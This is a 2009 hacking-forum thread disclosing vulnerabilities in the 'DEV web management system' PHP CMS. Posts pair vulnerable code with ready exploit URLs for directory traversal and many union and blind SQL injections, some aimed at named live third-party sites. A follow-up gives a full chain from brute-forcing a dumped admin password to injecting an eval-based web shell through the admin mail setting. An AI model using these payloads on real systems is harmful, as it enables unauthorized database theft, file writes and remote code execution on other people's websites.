DEV web management system

Discussion in 'Веб-уязвимости' started by AFoST, 16 Oct 2009.

  1. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Продукт DEV web management system

    ========================
    Directory reading

    PHP:
    gallery.php
    ...
    if (    $ct) {
    $dp=OpenDir ("$configuration->gallery_folder_url$ct/");

    $i=0;

    $configuration->thumbnail_spacing=floor($configuration->thumbnail_spacing/2);


    while (    $fname=ReadDir($dp)) {
    ...
    http://dev/index.php?session=0&action=gallery&page=1&ct=wallpapers/../../​
    example: http://www.hornatorysa.com/index.php?session=0&action=gallery&page=1&ct=/../../../../../www/hornatorysa.com/public_html/​
    ===========================
    SQL-injection

    PHP:
    determ_title.php
    ...
    switch (    $action) {
     case     "register";
         $pagetitle="$configuration->site_name :: $language[AUTHOR_REGISTRATION]";
     break;
    case     "add";
         $pagetitle="$configuration->site_name :: $language[ADD_ARTICLE_INTO_SYSTEM]";
     break;
    case     "read";
     @    $titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
         $pagetitle="$configuration->site_name :: $titlpart[nazov]";
     break;
    case     "komentar";
     @    $titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
         $pagetitle="$configuration->site_name :: $titlpart[nazov] - $language[COMMENTS]";
     break;
    ...
    http://dev/?action=read&article=1+union+select+concat(name,0x3a,value%20)+from+variables1+limit+2,1+--%20-​
    example: http://2pure.net/?action=read&article=1+union+select+concat(name,0x3a,value%20)+from+variables1+limit+2,1+--%20-​
    =========================
    SQL-injection

    PHP:
    komentar.php
    ...
    $prikaz="SELECT * FROM komentar1 WHERE article LIKE '".$article."' ORDER BY id DESC LIMIT ".($page-1)*$configuration->comments_boards_entries.",".$configuration->comments_boards_entries;
    $total=mysql_fetch_row(mysql_query("SELECT count(id) FROM komentar1 WHERE article LIKE '$article'",$spojenie));
    $vysledok=mysql_query ($prikaz,$spojenie);
    ...
    http://dev/index.php?session=0&action=komentar&article=2+union+select+concat(name,0x3a,value%20)+from+variables1+limit+2,1+/*​
    ========================
    SQL-injection

    PHP:
    readtp.php
    ...
    $prikaz="SELECT * FROM topic1 WHERE id=$id";
    $vysledok=mysql_query ($prikaz,$spojenie);
    $zaznam=mysql_fetch_array ($vysledok);
    ...
    http://dev/index.php?action=readtp&id=1+union+select+1,concat(name,0x3a,value%20),3,4,5+from+variables1+limit+2,1+--%20-​
    ==========================
    SQL-injection blind

    PHP:
    komentar.php
    ...
         $enteredexist=mysql_fetch_array(mysql_query ("SELECT id FROM autor1 WHERE nickname like '$autor'"$spojenie));
    ...
    http://dev/index.php?session=0&action=komentar&article=&autor=-1'+union+select+1+into+outfile+'c:/1.txt'+--%20-​
    ==========================
    SQL-injection blind

    PHP:
    komentar.php
    ...
    if (    $spravit=="pridat") {
     if (    $autor=="" || $nazov=="" || $komentar =="") {
     ...
     elseif (!    mysql_fetch_array(mysql_query("SELECT id FROM prispevok1 WHERE id=$article",$spojenie))) {
      echo (    "<b><center>FATAL ERROR: ARTICLE NOT FOUND</center></b><br/><br/>");
     }
    ...
    http://dev/index.php?session=0&action=komentar&spravit=pridat&article=1+union+select+1+into+outfile+'c:/2.txt'+/*​
    =========================
    SQL-injection blind

    PHP:
    read.php
    ...
    $prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
    $xvysledok=mysql_query ($prikaz,$spojenie);
    $xzaznam=mysql_fetch_array ($xvysledok);
    ...
    http://dev/index.php?action=read&article=-1+or+5=(select+substring(version(),1,1))+--%20--
    http://dev/index.php?action=read&article=-1+and+1=0+union+select+1,2,3,4,5+into+outfile+'c:/1.txt'--%20--​
    =========================
    SQL-injection blind

    PHP:
    send.php
    ...
    $prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
    $xvysledok=mysql_query ($prikaz,$spojenie);
    ...
    http://dev/index.php?action=send&article=-1+or+5=(select+substring(version(),1,1))+--%20--​
    =========================
    SQL-injection blind

    PHP:
    fpasswd.php
    ...
    if (    $odoslane=="true" && $login!="") {
    $login=trim ($login);
    $prikaz="SELECT nickname, mail, heslo FROM autor1 WHERE nickname LIKE '".$login."'";
    $vysledok=mysql_query($prikaz,$spojenie);
    $zaznam=mysql_fetch_array($vysledok);
    ...
    http://dev/index.php?action=forgot&odoslane=true&login='+or+5=(select+substring(version(),1,1))--%20-​
     
    #1 AFoST, 16 Oct 2009
    13 people like this.
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    ========================
    Shell uploading

    PHP:
    class_configuration.php
    ...
     function     ConfLoadDBtoPHP () {
    global     $session$sessidn;
      global     $spojenie;
          $xe=@mysql_query ("SELECT * FROM variables1 ORDER BY name"$spojenie);
      if (    $xe):
       while (    $xe_r=mysql_fetch_array($xe)) {
           $xe_r[value]="\"".stripslashes($xe_r[value])."\"";
       if (    $xe_r[value]=="\"_true\""$xe_r[value]="true";
       if (    $xe_r[value]=="\"_false\""$xe_r[value]="false";
        if (    $xe_r[name]) {
             $cmd_eval="\$"."this->".$xe_r[name]."=".$xe_r[value].";";
         eval(    $cmd_eval);
        }
       }
       return     true;
      else:
       return     false;
      endif;
     }
    ...
    Заходим в админку под паролем, который сбрутили, получив из SQL-injection.
    http://dev/admin/index.php?sessidn=[ADMIN_SESSION]&action=admin&sec=adminset
    Редактируем "Administrator's mail" и вставляем туда
    \"; eval($_REQUEST[ev]); $var=\"
    Шелл:
    http://dev/?ev=phpinfo();​
     
    #2 AFoST, 16 Oct 2009
    4 people like this.
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    слив РОА
     
    #3 Kakoytoxaker, 23 Apr 2010
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.